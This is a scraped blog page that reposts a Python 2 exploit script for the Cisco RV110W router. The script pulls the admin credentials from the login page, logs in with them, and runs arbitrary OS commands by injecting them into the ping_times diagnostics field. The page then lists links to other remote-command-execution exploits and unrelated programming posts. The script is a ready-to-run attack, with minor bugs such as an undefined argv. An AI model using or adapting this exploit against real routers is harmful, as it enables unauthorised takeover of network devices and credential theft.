#!/usr/bin/env python2

#####

## Cisco RV110W Password Disclosure and OS Command Execute.

### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)

# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute

# Date: 2018-08

# Exploit Author: RySh

# Vendor Homepage: https://www.cisco.com/

# Version: 1.1.0.9

# Tested on: RV110W 1.1.0.9

# CVE : CVE-2014-0683, CVE-2015-6396

import os

import sys

import re

import urllib

import urllib2

import getopt

import json

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

###

# Usage: ./{script_name} 192.168.1.1 443 "reboot"

###

if __name__ == "__main__":

    IP = argv[1]

    PORT = argv[2]

    CMD = argv[3]

    # Get session key, Just access index page.

    url = 'https://' + IP + ':' + PORT + '/'

    req = urllib2.Request(url)

    result = urllib2.urlopen(req)

    res = result.read()

    # parse 'admin_pwd'! -- Get credits

    admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]

    admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]

    print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd

    # Get session_id by POST

    req2 = urllib2.Request(url + "login.cgi")

    req2.add_header('Origin', url)

    req2.add_header('Upgrade-Insecure-Requests', 1)

    req2.add_header('Content-Type', 'application/x-www-form-urlencoded')

    req2.add_header('User-Agent',

                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')

    req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')

    req2.add_header('Referer', url)

    req2.add_header('Accept-Encoding', 'gzip, deflate')

    req2.add_header('Accept-Language', 'en-US,en;q=0.9')

    req2.add_header('Cookie', 'SessionID=')

    data = {"submit_button": "login",

            "submit_type": "",

            "gui_action": "",

            "wait_time": "",

            "change_action": "",

            "enc": "",

            "user": admin_user,

            "pwd": admin_pwd,

            "sel_lang": "EN"

            }

    r = urllib2.urlopen(req2, urllib.urlencode(data))

    resp = r.read()

    login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]

    session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]

    # Execute your commands via diagnose command parameter, default command is `reboot`

    req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)

    req3.add_header('Origin', url)

    req3.add_header('Upgrade-Insecure-Requests', 1)

    req3.add_header('Content-Type', 'application/x-www-form-urlencoded')

    req3.add_header('User-Agent',

                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')

    req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')

    req3.add_header('Referer', url)

    req3.add_header('Accept-Encoding', 'gzip, deflate')

    req3.add_header('Accept-Language', 'en-US,en;q=0.9')

    req3.add_header('Cookie', 'SessionID=')

    data_cmd = {"submit_button": "Diagnostics",

            "change_action": "gozila_cgi",

            "submit_type": "start_ping",

            "gui_action": "",

            "traceroute_ip": "",

            "commit": "",

            "ping_times": "3 |" + CMD + "|",

            "ping_size": "",

            "wait_time": "",

            "ping_ip": "127.0.0.1",

            "lookup_name": ""

            }

    r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))

[EXP]Cisco RV110W - Password Disclosure / Command Execution的更多相关文章

  1. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. PowerShell vs. PsExec for Remote Command Execution

    Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...

  4. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  5. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  6. Fatal error encountered during command execution

    MySQL + .net + EF 开发环境,调用一处sql语句报错: Fatal error encountered during command execution[sql] view plain ...

  7. MYSQL报Fatal error encountered during command execution.错误的解决方法

    {MySql.Data.MySqlClient.MySqlException (0x80004005): Fatal error encountered during command executio ...

  8. My SQL和LINQ 实现ROW_NUMBER() OVER以及Fatal error encountered during command execution

    Oracle 和SQL server都有ROW_NUMBER() OVER这个功能函数,主要用于分组排序,而MySQL 却没有 SELECT * FROM (SELECT ROW_NUMBER() O ...

  9. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

随机推荐

  1. Mysql连接数太多ERROR 1040 (HY000): Too many connections

    数据库连接报错:ERROR 1040 (HY000): Too many connections   1.查看连接数 /usr/local/mysql/bin/mysqladmin -h host - ...

  2. 《CSAPP》符号解析

    符号解析 链接器解析符号引用的方法是将每个引用与它输入的可重定位目标文件的符号表中的一个确定的符号定义联系起来.编译器只允许每个模块中每个本地符号只有一个定义. 对于全局符号,当编译器遇到一个不是在当 ...

  3. ucore-lab1-练习5report

    实验5--实现函数调用堆栈跟踪函数 需要完成kdebug.c中函数print_stackframe的实现,可以通过函数print_stackframe来跟踪函数调用堆栈中记录的返回地址. 一.函数堆栈 ...

  4. FortiGate日志设置

    1.默认 FGT5HD3916802737 # config log syslogd setting FGT5HD3916802737 (setting) # show config log sysl ...

  5. java基础 ----- 选择结构

    ---------    流程控制 ------     流程图 ------   基本的  if  选择结构 import java.util.Scanner; public class GetPr ...

  6. node.js中通过stream模块实现自定义流

    有些时候我们需要自定义一些流,来操作特殊对象,node.js中为我们提供了一些基本流类. 我们新创建的流类需要继承四个基本流类之一(stream.Writeable,stream.Readable,s ...

  7. Linux-echo、cat命令详解(14)

    echo:显示一段文字 比如: echo hello,串口上就显示hello echo hello > /dev/tty1, LCD上便显示hello字段 cat:查看一个文件的内容 比如: c ...

  8. Python开发——函数【基础】

    函数的定义 以下规则 函数代码块以 def 关键词开头,后接函数标识符名称和圆括号(). 任何传入参数和自变量必须放在圆括号中间.圆括号之间可以用于定义参数. 函数的第一行语句可以选择性地使用文档字符 ...

  9. RIDE 接口自动化请求体参数中文时报错:“UnicodeDecodeError: 'ascii' codec can't decode byte 0xd7 in position 9......”

    在进行robotframework  接口自动化,在请求体参数中输入中文会报以下错误: UnicodeDecodeError: 'ascii' codec can't decode byte 0xd7 ...

  10. SSL、TLS协议格式、HTTPS通信过程、RDP SSL通信过程(缺heartbeat)

    SSL.TLS协议格式.HTTPS通信过程.RDP SSL通信过程   相关学习资料 http://www.360doc.com/content/10/0602/08/1466362_30787868 ...